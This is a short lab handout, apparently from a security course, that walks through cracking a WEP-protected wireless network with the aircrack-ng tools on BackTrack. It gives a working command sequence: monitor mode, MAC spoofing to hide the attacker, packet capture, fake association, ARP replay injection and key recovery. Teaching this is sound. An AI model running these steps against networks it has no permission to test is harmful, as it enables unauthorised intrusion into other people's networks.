#### Lab Section: Wireless Security

## Lab Title: Crack WEP using Blacktrack3.0 live CD

## **Purpose**:

- 1. Understand how WEP works.
- 2. Understand the method of cracking WEP
- 3. **Warning**: It is illegal to crack other peoples' wireless connection without their permission. this tutorial is for educational purposes only

# **Preparation**:

- 1. Check if your wireless card is supported by Blacktrack: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
- 2. Detect, sniff, inject wireless network
- 3. Always can use "man <command>" to get the description of the command.

# Tools:

- 1. airmon-ng: change the wireless card into monitor mode.
- 2. ifconfig: configure a card
- 3. iwconfig: configure a wireless card
- 4. macchanger: change the mac address of a networking card
- 5. airodump-ng: capture packets
- 6. aireplay-ng: generate traffic by injecting ARP-request packets into a wireless network.
- 7. commview for wifi: (optional) generate traffic.

## Procedure:

## 1. Get the target AP's information (BSSID, ESSID, channel etc.)

Open a terminal window.

# cd /tmp

- # iwconfig
  - -- Show and get the wireless device name.
- # airodump-ng <device>
  - -- Once you get the information, press crtl+c to stop the capture, then copy and paste the target AP's information to a notepad.

## 2. Change the wireless card's MAC address

- # macchanger -s rausb0
  - -- Show the wireless card's MAC address
- # airmon-ng stop <device>
  - -- turn wireless card into manage mode.
- # ifconfig <device> down
  - -- Turn off the wireless card; otherwise you can not change the MAC address.

# macchanger -a rausb0

- -- Change the MAC of the wireless card to a faked MAC. An attacker always wants to hide himself. This is a necessary step for attack purpose.
- # ifconfig <device> up
  - -- Turn on the wireless card.

#### 3. Change the wireless card into monitor mode

- # airmon-ng start <device>
  - -- Enable the monitor mode
- # iwconfig
  - -- Make sure the wireless card is in the Monitor mode.

#### 4. Capture packets:

# airodump-ng -c <channel> -w <file name> --bssid <AP's bssid> --ivs <device>

-- To understand the parameter's meaning, type "airodump --help" or "man airodump". Leave this window opened

# 5. Associate the wireless card with the target AP:

Open a new terminal window

# aireplay-ng -1 0 -e <essid> -a <bssid> -h <wireless card's MAC> <device>

-- To understand the parameter's meaning, type "aireplay --help" or "man aireplay".

#### 6. Generate traffics:

# aireplay-ng -3 -b <bssid> -h <wireless card's MAC address> <device>

-- To understand the parameter's meaning, type "aireplay --help" or "man aireplay". Leave this window opened. Additionally, you can use commview for wifi to generate traffics to increase the crack process.

## 7. Crack the password:

Open a new terminal window # cd /tmp # aircrack-ng -b <bssid> \*.ivs

- 1. For more information, please visit my blog http://jhuang8.blogspot.com/.
- 2. Video demo is located in <u>http://www.valit.ca/lab/</u>.